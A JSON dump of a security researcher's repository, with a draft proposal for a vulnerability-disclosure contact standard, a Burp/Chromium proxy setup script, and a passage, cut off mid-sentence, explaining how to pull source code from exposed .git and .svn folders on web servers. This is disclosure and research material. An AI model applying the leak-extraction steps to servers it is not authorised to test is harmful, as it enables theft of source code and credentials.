[
  {
    "path": ".gitignore",
    "content": "hidden_directories_leaks/assets.zip\nsnippets/sqlite_sqlinjection_research.txt\n.idea/\n*/**/.idea\n\n"
  },
  {
    "path": "README.md",
    "content": "\n#### Most common security vulnerabilities in npm static content/file servers modules\n\nhttps://github.com/bl4de/research/blob/master/npm-static-servers-most-common-issues/npm-static-servers-most-common-issues.md\n\n\n\n#### Hidden directories and files as a source of sensitive information about web application\n\nSome analysis about how to get information about web application from folders like _.git_ , _.idea_ and similar.\nhttps://github.com/bl4de/research/tree/master/hidden_directories_leaks\n\nAs a part of this, I'm working on tool (in Python) to extract data from revealed Git repositories:\n\nhttps://github.com/bl4de/security-tools/tree/master/diggit\n\n\n\n#### RAA Ransomware JavaScript code analysis\n\nDetailed, step-by-step analysis of RAA ransomware, created entirely in JavaScript\n\nhttps://github.com/bl4de/research/tree/master/raa-ransomware-analysis\n\n\n\n#### Simple JavaScript malware code deobfuscation walkthrough\n\nJavaScript malware code deobfuscation step-by-step walkthrough\n\nhttps://github.com/bl4de/research/blob/master/javascript-malware-obfuscation/Simple_JavaScript_malware_code_obfuscation_examples.md\n\n\n\n"
  },
  {
    "path": "VACS-draft.md",
    "content": "July, 2016\n\n## Introduction\n\nWe're living in the Net. All our data, communication, money, work, almost everything depends on billions of zeros and ones traveling all around the world in every single second. We're living in information age and there's no doubt it will be changing our lives more and more in the nearest future.\n\nBut there's also different story. There are thousands of people trying to steal those data and use them to do bad things. Cybercrime is raising, like never before, and we all should do something to stop this.\n\nThings already started to change. Companies like Google, Yahoo!, Mozilla, Microsoft and many others actively support IT Security community providing Bug Bounty programs, looking for software vulnerabilities and sharing knowledge. Conferences like DefCon, BlackHat, CanSecWest, OWASP AppSec and many others all around the world allow people to learn and share information, experience, tools and even more knowledge.\n\nCouple of years ago, a new popular way to improve IT security emerged. Bug bounty platforms, like HackerOne, BugCrowd, Synack and Cobalt started to attract companies to run their own Bug Bounty programs.\n\nThere are hundreds of bug bounty programs running right now with many more to come in the next years. In those programs, thousands of Ethical Hackers, both professional and amateur, young and old, advanced and beginners, men and women, looking for bugs in software, websites, web applications and helping to fix security issues. They are all working for safer web and safer software. They helped to fix tens of thousands security issues so far, providing safer web for all of us.\n\nBut unfortunately this is not enough. There are millions of websites and web applications in the Internet right now. And as the recent report from Acunetix points - approximately 55% of 45,000 websites (more than a half of forty five thousands) contain at least one serious vulnerability (XSS, SQLi, Remote Code Execution, Local File Include, Remote File Include). And, what is more important, there's almost 9% more than in 2015.\n\nAs 45,000 is a quite big probe, we can assume that this problem exists in larger scale as well.\n\n**This is just a disaster. Couple of weeks ago World Wide Web celebrated its 25th Anniversary. And after 25 years - we're still not able to provide secure websites**\n\n\n## What is this all about, really?\n\nInformation. Why so many websites are still so vulnerable? The reason is relatively simple. I found that **in many cases the problem is that website owner simply don't know about vulnerability in their own website**. And this is one thing we should change as soon as possible.\n\nLet's be honest - in many cases everything starts from relatively simple level. Let's take a look at some examples: \n\n- outdated software like not patched CMS or online e-commerce engine \n- \"selfmade\" CMS system with simple SQL Injection, Remote Code Execution or similar high risk vulnerability\n- Stored XSS vulnerability allowing to steal website administrator credentials and gain access to admin panel \n- Reflected XSS which allows to inject malware via phishing attack \n- weak credentials for remote server access, easy to bruteforce, dictionary attack or just trivial to guess\n- left folders from Git, SVN or any other source version control system repository, which allows to download and read source code\n- Local File Include vulnerability giving access to website source code contains database credentials\n- administration panels hidden behind \"secret\" urls or with very weak credentials (again, easy to guess, bruteforce or exploit with dictionary attack)\n\nAll vulnerabilities above have couple of things in common:\n\n- they are relatively simple to find and prevent\n- they are also **very simple to find by cybercriminals too**\n- they are **very easy to exploit**\n\nThis is not a rocket science and every day I am surprised I can find any of those listed vulnerabilities in just couple of minutes. I did some experiment recently and started to look for vulnerable websites during my lunch break (~30 mins), based on simple Google dorks. I was able to find from five to even twenty vulnerable websites while eating my sandwich (XSS, SQL Injection and LFI were the Top 3).\n\n\nWhen I find problem in my code, I'm resolving it. If it's a security problem, I'm resolving it even faster.\n\n**If I find security problem in someones else code, I'm trying to inform the right person immediately to allow them to fix their code.**\n\nIn almost every single case, **the problem is that I don't know who exactly I have to or should to notify**. I dig around, obviously 'Contact' and 'About us' are the first places I go. Sometimes I find email like _info@companyname.com_, if I am lucky it's even better, like _webmaster@companyname.com_\n\n\nIf I find something like this, I send my standard notification email where I introduce myself with my full name and surname, what I do and why I contact. \nThen, I nicely ask about contact information to responsible person which I can provide Proof of Concept of vulnerability, screenshots (if needed) and all technical information about vulnerability I've just found. I do this because I care about web security and I want to help. Really. This is how I can help to make web better and safer place. This is one of many ways I am doing this.\n\nAlmost in every case I'm trying to provide sample scenario how vulnerability can be used by cybercriminals (eg. phishing attack or maybe even data breach)\n\n**My notification email to response ratio is about 20 to 1.\nYes, for every twenty emails sent with vulnerability description I'm receiving approximately one response. If any.**\n\nAnother problem occurs when I just can't find any contact information on the website. In such cases I start to dig for social media accounts, like Twitter or Facebook and try to reach someone using one, if found.\n\nSo far, it's even worse than emails. **Almost nobody responses using this communication channel even if I see that account is active and fresh tweet or post on Facebook appeared online an hour or day earlier**\n\n\n## Let's summarize problems we found so far\n\nIn typical website, either private or corporate, two or three problems occur:\n\n#### Problem number one\n\nI can not find any IT stuff contact information even if this is very big, well known brand (company), except some _webmasters@company.com_ from almost always I did not get any response anyway, so it's totally useless.\n\n#### Problem number two\n\nNobody really cares about what I found. And this is even bigger problem than the first one, because it is a proof that IT Security is **not important** for website owner and I suppose it's not a problem with their website only but with whole IT infrastructure. Nowadays, where cybercrime is a real threat - it's incomprehensible.\n\nI'ts **stupid**, it's **ignorance**, it's **lack of basic knowledge of security**\n\n#### Problem number three\n\nThis one is specific for big companies. \n\nInternal procedures. Exchange information between departaments. Find the right people to do the right job. \n\nThe truth is that meetings, conference calls, Excel spreadsheets and \"Judy from HR has a new boyfriend\" in the kitchen - **they all do not resolve any problems**. Information like mine get stuck somewhere between PR, Marketing and this strange guy from IT which nobody knows, because he is quiet and does not go to company Friday Lunches - somewhere in the middle of Big Company Nowhere.\n\n\n\n## Vulnerability Alert Contact Standard proposition\n\nIn the last couple of years lot of things in security have changed in web browsers and HTML5 specification.\n\nCORS prevents website from JavaScript access from other domains. HTTPS is now forced to be default way to communicate between client and server and HSTS header does its job here. XSS Auditor engines in WebKit/Blink-based browsers defends users against obvious XSS attack vectors. Content Security Policy provides a simple way to define scope for resources like JavaScript, CSS and media external sources as well as rules for executing inline JavaScript code. Cookies become more secure thanks to HTTP Only and Secure flags. \n\nAll the things seemed to be moving to the right direction.\n\nBut in case of vulnerability still one thing left to be done - someone has to be notified about one to be aware of it and fix it. So far, the best way to do this is by dedicated contact information provided. LinkedIn's https://security.linkedin.com/vulnerability-disclosure is one of examples. Running bug bounty program on platforms like mentioned earlier HackerOne or BugCrowd is even better.\n\nBut we're not talking about such companies.\nWe're talking about hundreds of thousands of others.\n\n\nMy proposition is to provide **Vulnerability Alert Contact Standard** specification, which will allow to setup contact information **in case of vulnerability report only** in form of standard HTML meta tag or custom server HTTP response header (like X-XSS-Protection), dedicated email address (similar to _abuse@companyname.com_) or any other contact form.\n\n**My idea is something like 112 (or 911 in US) phone number** - if there's something wrong going on, you just pick up the phone and call that number. **VACS should be something you can use when there is something wrong (from security perspective) with the website you're visiting**\n\n\n## Technical details of VACS standard\n\n### HTTP Respone header\n\nFirst way to provide VACS contact details is to send dedicated HTTP header in server response.\n\nWe already have something similar. This is **Content-Security-Policy-Report-Only** HTTP header and it does exactly what its name points to - in case of violation of Content Security Policy rule this header provides ```report-uri``` property, where report should be sent by the browser.\n\nIn the same way VACS header(s) could be provided:\n\n```\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nVulnerability-Alert-Contact: a.smith@companyname.com\n```\n\nTo prevent from less sophisticated spam attacks, format of email address in header could be defined in two separate fields:\n\n```\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nVulnerability-Alert-Contact: a.smith\nVulnerability-Alert-Contact-Domain: companyname.com\n```\n\nIn this scenario full VACS email address will be:\n\n```\na.smith@companyname.com\n```\n\nDomain header also could be simplified just by directive ```same-domain```, which points to website domain:\n\n```\nHTTP/1.1 200 OK\nServer: Apache-Coyote/1.1\nVulnerability-Alert-Contact: a.smith\nVulnerability-Alert-Contact-Domain: same-domain\n```\n\nIn this scenario full VACS email address for https://google.com will be composed to following one:\n\n```\na.smith@google.com\n```\n\n### HTTP &lt;meta> tag\n\nAnother way to provide VACS contact could be implemented as HTML ```<meta>``` tag in ```<head>``` section.\n\nThe meaning of this tag is exactly the same as in HTTP header:\n\n```HTML\n<html>\n<head>\n\t<title>My Website</title>\n\t<meta name=\"Vulnerability-Alert-Contact\" content=\"a.smith\"></meta>\n\t<meta name=\"Vulnerability-Alert-Contact-Domain\" content=\"companyname.com\"></meta>\n</head>\n\n\n<body>\n(...)\n```\n\nThe same example with ```same-domain``` directive:\n\n```HTML\n<html>\n<head>\n\t<title>My Website</title>\n\t<meta name=\"Vulnerability-Alert-Contact\" content=\"a.smith\"></meta>\n\t<meta name=\"Vulnerability-Alert-Contact-Domain\" content=\"same-domain\"></meta>\n</head>\n\n<body>\n(...)\n```\n\n\n## Why is this so important for me? And should be for you as well?\n\nOn 20th of September, Casey Ellis from TechCrunch published very interesting article about vulnerability reporting in medical devices.\n\nMost of his article is focused on those devices, but there are couple of universal thoughts valid for IT Security in general:\n\n> Vulnerability disclosure ethics are an inherently murky area. There are countless vulnerabilities that exist unpatched in software systems,(...)\n\n> Ideally, vulnerabilities are discovered when the vendor learns about them through their own testing or through the help of\n> security researchers operating under a “Coordinated Disclosure” or bug bounty model. Other times, vulnerabilities found are \n> kept secret, and used for attack, unbeknownst to the manufacturer or their users. Then there’s what is called “Full \n> Disclosure,” where discovered vulnerabilities are simply disclosed to the public, sometimes before the vendor has had the \n> opportunity to respond. These three scenarios are status quo for disclosure.\n\n\n(source: https://techcrunch.com/2016/09/20/hacking-for-investor-profit/ by Casey Ellis, TechCrunch)\n\n\nBut more important from my point of view is this fragment:\n\n\n> Full Disclosure is most frequently chosen out of frustration at a slow response or bad communication by the impacted \n> organization. The risk of Full Disclosure can be mitigated by organizations, firstly by taking whatever steps are necessary \n> to identify and fix vulnerabilities in the first place, then by establishing clear channels and expectations between security \n> researchers and vendors around newly identified ones.\n\n\n**Full Disclosure is most frequently chosen out of frustration at a slow response or bad communication by the impacted organization** - this is what you can expect when you ignore Security Reseacrher(s) and their reports about vulnerability found in **your software or website**. Full Disclosure menas someone with not the best intentions can easily use vulnerability **against** your company and causes real problems. Money problems. Your money problems.\n\n**The risk of Full Disclosure can be mitigated by organizations, firstly by taking whatever steps are necessary to identify and fix vulnerabilities in the first place...** - that's why Security Reseacrhers and Ethical Hackers send you notifications about vulnerabilities found in your websites, software, network infrastructure and so on. It's like your good neighbour telling you that you left your window open in the morning, when you was leaving your house going to work. What would you do then? Ignore him? Send him a letter with \"Thank you!\" a week later? \n\nOr would you rather go back immediately, close the window and say something like \"Hey, thanks Joe! Have a nice day, I own you a beer!\" or something similar?\n\n**... by establishing clear channels and expectations between security researchers and vendors around newly identified ones**\nAgain, this is all about this post is.\n\nCommunication channel allowing anyone to report vulnerability found in **your** software.\n\n\n## What we can do today?\n\nNot much to be honest. Beside all websites currently having any type of bug bounty programs or similar, there is nothing called \"good practice\" to drop somewhere contact information for security issues.\n\nSo, **if you are web developer and you care about website you've created**:\n\n- place somewhere in the source code, in comment (it can be even CSS or JavaScript file, but ideally if it will be at the beginning or the end of HTML) email address and short note what is this email for, like in example:\n\n```HTML\n\t(...)\n\t<footer>Copyrigth BlaBla 2016</footer>\n\t<!-- any vulnerability found please report to: a.smith@companyname.com Thank you! -->\n</body>\n</html>\n\n```\n\n- @EdOverflow (https://twitter.com/EdOverflow) maintains a project __Security.txt__ - dedicated file like robots.txt, but for security related issues:\n\n> Security.txt is a standard that allows websites to define security policies. This standard sets clear guidelines for security researchers for how to report security issues and allows bug bounty programs to define a scope. Security.txt is the equivalent of robots.txt, but for security issues.\n\nExample security.txt file contains information as follows:\n\n```\n# In scope targets\nIn-scope: *.example.com\n\n# Out of scope targets\nOut-of-scope: test.example.com\n\n# Out of scope vulnerabilities\nOut-of-scope-vuln: Clickjacking\n\n# Our security address\nContact: security@example.com\n\n# Our HackerOne program\nPlatform: https://hackerone.com/example\n```\n\nYou can read more about his project here https://github.com/EdOverflow/security-txt\n\n- use ```contribute.json``` provided by **Mozilla** and add following JSON:\n\n```JOSN\n\n//schema:\n\n\"bugs\": {\n    \"properties\": {\n        \"list\": {\n            \"type\": \"string\"\n        }, \n        \"mentored\": {\n            \"type\": \"string\"\n        }, \n        \"report\": {\n            \"type\": \"string\"\n        }\n    }, \n    \"type\": \"object\"\n}\n\n// example of use (source: https://github.com/mozilla/contribute.json):\n\n\"bugs\": {\n\t\"list\": \"https://bugzilla.mozilla.org/buglist.cgi?query_format=advanced&bug_status=UNCONFIRMED&bug_status=NEW&product=www.mozilla.org\",\n\t\"report\": \"https://bugzilla.mozilla.org/enter_bug.cgi?product=www.mozilla.org&component=Bedrock\",\n\t\"mentored\": \"https://bugzilla.mozilla.org/buglist.cgi?f1=bug_mentor&o1=isnotempty&query_format=advanced&bug_status=NEW&product=www.mozilla.org&list_id=10866041\"\n}\n```    \nYou can find all details about this here: https://www.contributejson.org/\n\n\n## Needs some inspiration?\n\nIf you think about putting such information and you wonder how to do this, I present some great, real world examples below.\n\n#### Jet.com - an online store\n\nJet.com already provides bug bounty program on Bugcrowd and communicates it clearly in its HTML source:\n\n```html\n<!--\n\n        9ååååå\\          .ÖååååΓⁿ       \n       xååååååå          φååååååå       \n        ╘Öååå0.           q4åå@n        Hello from Hoboken,\n                                        \n                         ¬çççççç²       We <3 curious people!\n                         =ååååååS       \n                         =ååååååS       \n                         =ååååååS       \n        ìììììì=          =ååååååS       Working at Jet\n        åååååå#          ⌠ååååååm       https://jet.com/careers\n        ååååååå\"         Γåååååå~       \n        .ååååååå½l'  .:xååååååå(        \n          Çåååååååååååååååååå4¬         Responsible Disclosure\n            ²╚åååååååååååå╪≥.           https://bugcrowd.com/jet\n                'ⁿ»|!l,~                \n\n-->\n```\n\n\n\n## Who else takes care about this?\n\nList below contains companies which understand the problem and treat it seriously.\nIf you know any company I should put on this list as well, just let me know.\n\n**Twitter** (https://dev.twitter.com/overview/general/security-best-practices)\n\n> Have you set up security@yourapplication.com? Do those emails go right to your phone? Make it easy for people to contact you about potential security issues with your application. If someone does report a security flaw to you, be nice to them; they’ve just done you a huge favor. Thank them for their time and fix the issue promptly. It’s fairly common for security researchers to write about vulnerabilities they’ve discovered once the hole has been closed, so don’t be upset if your application ends up in a blog post or research paper. Security is hard, and nobody is perfect. As long as you’re fixing the issues that are reported to you, you’re doing right.\n\n\n## Thoughts?\n\nIf you'd like to talk about my idea, why it's bad (or good, I hope), what should I change, remove or add - just ping me on Twitter (https://twitter.com/_bl4de) or send an email (bloorq (AT) gmail.com).\n\nI'll try to keep this page up-to-date as long as there will be any feedback and reason to do this.\n\n## Resources\n\nHere you can find some links to resources I've mentioned in this writeup. There are not about my idea, but they provide good background to understand the problem and everyone, not only IT Security professionals, should care about web security.\n\n\n- Acunetix Web Application Vulnerability Report 2016 http://www.acunetix.com/acunetix-web-application-vulnerability-report-2016/\n- Acunetix Web Application Vulnerability Report 2015 http://www.acunetix.com/acunetix-web-application-vulnerability-report-2015/\n- OWASP Open Web Application Security Project https://www.owasp.org/index.php/Main_Page\n- \"Hacking for investor profit\" by Casey Ellis (TechCrunch, posted on 20th Sept. 2016) https://techcrunch.com/2016/09/20/hacking-for-investor-profit/\n\n\n\n"
  },
  {
    "path": "burp-chromium-setup/README.md",
    "content": "## Burp Suite and Chromium setup how-to\n\nThis is quick how-to presents my way to configure Chromium web browser to work with Burp Suite HTTP Proxy.\n\n### Why Chromium\n\nAs a full time, Full Stack Web Developer I use Chromium-based browsers and runtimes (Chromium, Chrome, Opera, node) all the time in my daily work. I found Developer Tools build in all of those products the most easy, flexible and powerful developer tools ever.  \n\nAlso, Chrome Developer Tools team constantly works on various improvements and big community ships a lot of plugins, which are easy to install and can be easily integrate into Chrome Developer Tools panels. Plugins are available for such frameworks like Angular or React (to name a few) - for web developer they are very useful tools, but not only for them.\n\nFrom web application security researcher point of view, those browsers have one big disadvantage. There is no simple way to set up Burp as proxy just for them, not for the whole system.\n\nActually only one browser allows you to do that and it's Firefox, first choice for many penetration testers because of easy way to set up Burp as proxy just for Firefox using Network/Advanced settings. \n\nUnfortunately, Firefox is very slow and its developer tools are far less advanced than in Chromium/Chrome/Opera.\n\nSolution for this was to create simple console script with couple of additional options. I'm using this script not only to run Chromium with proxy set to Burp, but also to disable XSS Auditor while testing website or web application for XSS vulnerabilities.\n\nBut let's start from Burp Suite first.\n\n## Set up Burp Suite\n\nBurp Suite Free Edition is one of the best tool any not professional penetration tester, bug hunter or web application security eager (like me) can get (Thanks Portswigger!!!).\n\nYou can download Burp Suite from this url:\n\nhttps://portswigger.net/burp/download.html\n\nAfter installation run Burp Suite and go to Proxy->Options tab and in Proxy Listeners set up your local address and port you want to use (it can be any available port above 1024 well known ports, 8080 is just set by default)\n\n![Proxy settings](assets/proxy1.png)\n\nIf you are not familiar with Burp - 'Getting Started With Burp Suite' is likely the best place you can start from:\n\nhttps://portswigger.net/burp/help/suite_gettingstarted.html\n\n\n### Set up Chromium\n\nChromium, web browser based on Blink HTML engine and V8 JavaScript engine (used also by Chrome, Opera and node projects) can be downloaded from here:\n\nhttps://download-chromium.appspot.com/\n\nBuilds are available for all major platforms (OSX, Linux, Android and Windows)\n\n![Chromium download page](assets/chromium.png)\n\nAs you can see, there is always the newest build available. That's fine, because we don't want to use Chromium as our main web browser or even for testing web applications for our clients (if you're web developer you are already aware of this, aren't you? ;) )\n\nWhat we want is the newest compilation of Chromium Developer Tools to be able to use it while doing our web application penetration testing or bug bounty stuff.\n\nWhen you run Chromium, you can open its Developer Tools just by clicking F12 on Windows and Linux or CMD+ALT+i on OSX:\n\n![CDT](assets/dt1.png)\n\nThere are plenty of options available and what I recommend is just to go to this website:\n\nhttps://developer.chrome.com/devtools\n\nYou can find there everything you will need to become familiar with Chromium Developer Tools.\n\n### Run Chromium with Burp Suite as HTTP Proxy\n\nNow, when we have both Chromium and Burp set up, it's time to run them as one, perfect web application killing machine :)\n\nHere is my Bash script I am using to run Chromium using Burp as proxy:\n\n```bash\n#!/bin/bash\n#\n# see available options:\n# http://peter.sh/experiments/chromium-command-line-switches/\n#\n# 8080 - is a standard port for Burp\n# To disable XSS Auditor in Chromium simply put 0 as second argument, any other value leaves XSS Auditor enabled\n#\n\necho\necho \"Usage: chromium [port] [enable xss Auditor]\"\necho \" example:\"\necho \" $ chromium 8080 1 - runs Chromium listening on 8080 and XSS Auditor enabled\"\n\n# default settings\nxss_auditor=\"\"\nport=\"\"\n\nif [ $1 -ne 80 ]; then\n\tport=\"--proxy-server=127.0.0.1:$1\"\nfi\n\nif [ $2 == 0 ]; then\n\txss_auditor=\"--disable-xss-auditor\"\nfi\n\necho \"[+] running ./Chromium $port $xss_auditor\"\n\n# update those lines to your system specific path:\ncd /Applications/Chromium.app/Contents/MacOS\n./Chromium $port $xss_auditor\n\n```\n\nDepends on operating system you are using and path to directory where you have installed Chromium you have to modify last two lines (go to directory with Chromium and run Chromium with chosen options).\n\nThere are two options available in this script (of course you can modify it as you want).\n\nFirst, you may want to pass port number for proxy. So, if you set up Proxy listener port in Burp as 9999, this is the value you have to put in script as the first argument.\n\nSecond one is a flag to disable Chromium XSS Auditor. XSS Auditor is a build in XSS prevention tool in all Chromium based browsers (Chromium, Chrome and Opera) and it prevents user from some of less sophisticated XSS payloads.\n\nFrom penetration tester or bug bounty hunter point of view it's nice to have an option to disable this prevention. In script above, if you pass 0 - you disable XSS Auditor, any other value leaves it enabled.\n\nHere's sample of complete command to run Chromium with proxy litening on 8080 port and XSS Auditor disabled (```chromium``` is name of script I am using):\n\n```bash\n$ chromium 8080 0\n\nUsage: chromium [port] [enable xss Auditor]\n example:\n $ chromium 8080 1 - runs Chromium listening on 8080 and XSS Auditor enabled\n[+] running ./Chromium --proxy-server=127.0.0.1:8080 --disable-xss-auditor\n```\n\n![Burp and Chromium](assets/burp_with_chromium.png)\n\n## Summary\n\nOf course if you are not a fan of console scripts, Bash and all this stuff, you can still run Chromium with all those features (proxy, XSS Auditor disabled) simply by running this command:\n\n```\npath_to_chromium_folder/Chromium --proxy-server=127.0.0.1:8080 --disable-xss-auditor\n```\n\nThere are a lot of other options which can be set while running Chromium. One of the best list of them I found is on this website:\n\nhttp://peter.sh/experiments/chromium-command-line-switches/\n\n\nIf you have any questions just ping me on Twitter (https://twitter.com/_bl4de) or send me an email to bloorq[at]gmail[dot]com.\n\nHappy hacking!!!\n\nRafal 'bl4de' Janicki\n\n"
  },
  {
    "path": "hidden_directories_leaks/README.md",
    "content": "# Hidden directories and files as a source of sensitive information about web application\n\nHidden directories, left accidentally (or not) on the server, might be a very valuable source of sensitive data leaks.\nThere's a lot of hidden directories: source code version systems folders and files (.git, .gitignore, .svn), any of .rc files (.npmrc, package.json, .htaccess), any not standard configuration files with common extensions, like config.json, config.yml, config.xml and many others.\n\nThere's a lot of web servers where there's no problem to find such files with a lot of sensitive information. Let's take a look at them in more details.\n\n# Table of Contents\n\n- [Source code version control systems](#source-code-version-control-systems)\n\t- [Git](#git)\n\t- [Subversion](#subversion-svn)\n- [IDE project files](#ide-project-files)\n\t- [JetBrains IntelliJ, PHPStrom, WebStorm](#jetbrains-ides---intellij-webstorm-phpstorm)\n\t- [NetBeans](#netbeans-ide)\n\t- [ActiveState Komodo IDE](#activestate-komodo-IDE)\n- [Developer Tools configuration files](#developer-tools-configuration-files)\n- [Recommended tools](#recommended-tools)\n\n\n# Source code version control systems\n\n## Git\n\nGit is \"(...)a free and open source distributed version control system designed to handle everything from small to very large projects with speed and efficiency (https://git-scm.com/)\". With GitHub.com web service it's one of the most popular source code version control system right now, especially in open source world. Also, a lot of companies use its own GitHub-like service (Gitlab - see https://about.gitlab.com/).\n\n### Basic information about Git objects\n\nNewly created Git repository contains some default folder and files, where all information are stored. Here's sample .git folder, with one commit done.\n\n![.git folder structure with single commit](assets/git_directory_structure.png)\t\n\nLet's take a look at this from attacker point of view. Git repository content is written in objects. All of them are stored in .git/objects folder. \n\nObjects can be one of three types: _commit_, _tree_ and _blob_. \n\n*_Commit_* is an information about commit, with current tree (folders and files structure) object hash.\n\n*_Tree_* contains information about folders and files structure - and every single folder or file has its own object hash stored in tree object. It might be another tree (folder which is one level down in the folders structure) or file.\n\n*_Blob_* is Git object type where files content are saved. In other way - if you know an object hash of the particular file, you can read content of this file using *git cat-file* command.\n\nWhen you find .git folder on web server, there's simple way to get content of any file, just by downloading and reading Git objects. To make sure that .git folder is available just check if you get HTTP 403 response (or similar, but not 404, because it means there's no .git folder on this server or in this location):\n\n\n![.git repository found on the server](assets/how-to-find.png)\t\n\n\n\n### Reflecting remote files and folders using local Git repository\n\n\nTo be able to do this, you have to create your own, local dummy .git repository with skeleton folder structure and download Git objects from remote server.\n\nFirst, create dummy Git folder:\n\n```\n$ git init\n```\n\nThis will initialize empty Git repository with all required files and folders.\n\n\n### Retrieving and reading information about objects\n\nTo start retrieving information from Git repository, first we have to find starting point. Git saves all information in log file and this file is available at _.git/logs/head_\n\n\n![.git/logs/file example](assets/git_logs_head_file.png)\n\n\nIf _.git/logs/head_ does not work, but _.git_ returns Forbidden 403, which means it's there, try _.git/logs/HEAD_ instead\n\n\n\nLet's take a look a little bit closer to sample line of this file:\n\n```\n0000000000000000000000000000000000000000 07603070376d63d911f608120eb4b5489b507692 \nbloorq@gmail.com <bloorq@gmail.com> 1452195279 +0000\tcommit (initial): index.php initial commit\n```\n\nFirst two strings are object hashes (previous and current commit) - and this is exactly what we are looking for.\nAs this is the very first commit, first hash contains only 0 (it's dummy one), but second one contains informations about commit.\n\nFirst we have to create valid path to object. Path contains common path to all objects in repository, which is _.git/objects_ and then there are two parts build from hash - a directory name (first two signs from hash) and filename (rest of it). So to get object identified by hash 07603070376d63d911f608120eb4b5489b507692, we should try to retrieve following url:\n\n_localhost/testapp/.git/objects/07/603070376d63d911f608120eb4b5489b507692_\n\n\nAnd - here we are - file download popup:\n\n![Downloading object file](assets/download_object_file.png)\n\nRemember - you have to save this file in your dummy Git folder created earlier - this is the simplest way to be able to read content of Git objects. So make sure that you saved it in exactly the same location:\n\n_path-to-your-dummy-git-repository/.git/objects/07/603070376d63d911f608120eb4b5489b507692_\n\nTo check the type of object, you can use following command:\n\n```\n$ git cat-file -t <hash>\n```\n\nTo display the content of the object, use this command:\n\n```\n$ git cat-file -p <hash>\n```\n\nNow, we can check the type and read content of saved object (I'm doing this on original repository on my localhost, but you will get exactly the same result on your machine for any Git repository - the hash is the key :) )\n\n![Execute Git cat-file commands on downloaded object](assets/git-commands.png)\n\n\nWhen you look at commit description, you can find an information about actual tree object hash - as I mentioned earlier, tree contains information about current folder structure. Using the same method as above it's simple to see how it looks like:\n\n\n![Current repository files structure](assets/git-commands-2.png)\n\n\nWe're very close. As you can see, currently there's only one file, _index.php_, and also we know its object hash and type, which is _blob_. And this is what we need to see content of file using the same method as we've used to read content of _commit_ and _tree_ objects before (first you have to download object from web server, as described above):\n\n![index.php content](assets/git-commands-3.png)\n\n\nVoila!\n\nNow it is important to remember that this is content of _index.php_ as it was when commit described by object 07603070376d63d911f608120eb4b5489b507692 was done. If you take a look at log file, you can see that there was second commit (identified by object hash 4db7a14eee2cd3ff529278b75e1653e677fe1d02) and as it is last commit - it contains all last changes - maybe content of _index.php_ differs from what we have seen so far?\n\nFollowing all steps (read commit content to find tree hash, then read tree to find index.php hash and so on), we will see actual content of _index.php_:\n\n```\nbl4de on Rafals-MacBook in /Library/WebServer/Documents/testapp $ git cat-file -p a4215057b6545240452087ad4d015bf9b5b817c5\n<?php\necho \"Hello testapp!\";\n\n$i = 100;\necho \"Value of i is $i\";\n\nbl4de on Rafals-MacBook in /Library/WebServer/Documents/testapp $ \n```\n\nBecause manual object retrieving is not efficient and very time consuming, I've created simple console tool in Python to automate this process. You can take a look at in here:\n\nhttps://github.com/bl4de/security-tools/tree/master/diggit\n\n\n\n### .gitignore file\n\nThere's also one thing worth to mention if we've found .git folder abandoned on web server - .gitignore file. The purpose of this file is simple - it is the place where you can define all folders and files which should NOT be committed into repository - but it does not mean that they are not there ;) (there are just not exists as a part of Git repository, that's all). So it's the simplest way to spot all content which can not be find in the way described above.\n\n\n![Sample .gitignore file](assets/sample-gitignore.png)\n\n\n## Subversion (SVN)\n\nSubversion (or SVN, https://subversion.apache.org/) is another very popular source code version control system created by Apache Software Foundation and it is still very popular and widely used.\n\nSample structure of SVN folders and files looks like following example:\n\n![Sample .snv directory](assets/svn_tree.png)\n\nFrom our point of view, the most important are _SQLite_ database _wc.db_ file and content of _pristine/_ directory. In _wc.db_ we will find hashes used as filenames in _pristine/_, so we have to start from this file.\n\nTo get information from Subversion, first we need to make sure that _wc.db_ file is available. Try to open following path in your web browser:\n\n```\nhttp://server/path_to_vulnerable_site/.svn/wc.db\n```\n\nIf you get download popup - it means there's a chance that the rest of _.svn_ files will be there. First, we need to read content of _wc.db_ to get an information about files hashes (there is no _.logs_ directory here, like it was in Git repository described above).\n\nTo read content of _wc.db_, I use SQLite console client, by you can use anything you want.\n\n```bash\n$ sqlite3 wc.db \nSQLite version 3.8.10.2 2015-05-20 18:17:19\nEnter \".help\" for usage hints.\nsqlite> .databases\nseq  name             file                                                      \n---  ---------------  ----------------------------------------------------------\n0    main             /Users/bl4de/hacking/playground/wc.db                     \nsqlite> .dump\nPRAGMA foreign_keys=OFF;\nBEGIN TRANSACTION;\nCREATE TABLE REPOSITORY (   id INTEGER PRIMARY KEY AUTOINCREMENT,   root  TEXT UNIQUE NOT NULL,   uuid  TEXT NOT NULL   );\nINSERT INTO \"REPOSITORY\" VALUES(1,'svn+ssh://192.168.1.4/var/svn-repos/project_wombat','88dcec91-39c3-4b86-8627-702dd82cfa09');\n\n(...)\n\nINSERT INTO \"NODES\" VALUES(1,'trunk',0,'',1,'trunk',1,'normal',NULL,NULL,'dir',X'2829','infinity',NULL,NULL,1,1456055578790922,'bl4de',NULL,NULL,NULL,NULL);\nINSERT INTO \"NODES\" VALUES(1,'',0,NULL,1,'',1,'normal',NULL,NULL,'dir',X'2829','infinity',NULL,NULL,1,1456055578790922,'bl4de',NULL,NULL,NULL,NULL);\nINSERT INTO \"NODES\" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);\nINSERT INTO \"NODES\" VALUES(1,'trunk/test2.txt',0,'trunk',1,'trunk/test2.txt',3,'normal',NULL,NULL,'file',NULL,NULL,'$sha1$6f3fb98418f14f293f7ad55e2cc468ba692b23ce',NULL,3,1456056740296578,'bl4de',27,1456056696000000,NULL,NULL);\n\n(...)\n```\n\nSee INSERT operations to NODES table? Each of them contains filename and SHA1 hash, which corresponds to entry in _pristine/_ folder:\n\n```bash\n$ ls -lA pristine/94/\ntotal 8\n-rw-r--r--@ 1 bl4de  staff  38 Feb 21 12:05 945a60e68acc693fcb74abadb588aac1a9135f62.svn-base\n```\n\nTo map value from NODES to filename, we need to:\n- remove _$sha1$_ prefix\n- add _.svn-base_ postfix\n- use first two signs from hash as folder name inside _pristine/_ directory (94 in this case)\n- create complete path, which will 